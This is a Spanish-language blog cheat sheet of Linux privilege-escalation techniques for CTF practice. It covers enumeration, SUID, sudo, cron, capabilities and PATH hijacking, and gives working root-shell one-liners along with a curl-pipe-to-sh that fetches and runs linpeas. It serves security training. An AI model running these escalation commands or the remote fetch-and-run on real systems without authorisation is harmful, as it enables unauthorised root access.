blog
Cheatsheet: Escalada de Privilegios en Linux
21 Apr 2026
Una referencia rápida que uso en mis CTFs para no olvidar ninguna técnica de privesc.
1. Enumeración inicial
Siempre empezar con linpeas:
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
O manual:
id && whoami
uname -a
cat /etc/passwd | grep -v nologin
sudo -l
2. SUID
find / -perm -4000 -type f 2>/dev/null
Consulta GTFOBins para explotar cada binario.
Ejemplo con find:
find . -exec /bin/sh \; -quit
3. Sudo
sudo -l
Si tienes algo como (ALL) NOPASSWD: /usr/bin/vim:
sudo vim -c ':!/bin/bash'
4. Cron Jobs
cat /etc/crontab
ls -la /etc/cron.*
Busca scripts que puedas modificar o paths mal configurados.
5. Capabilities
getcap -r / 2>/dev/null
python3 cap_setuid+ep → python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
6. Variables de entorno PATH
Si un script ejecuta comandos sin path absoluto:
echo "/bin/bash" > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH
./script_vulnerable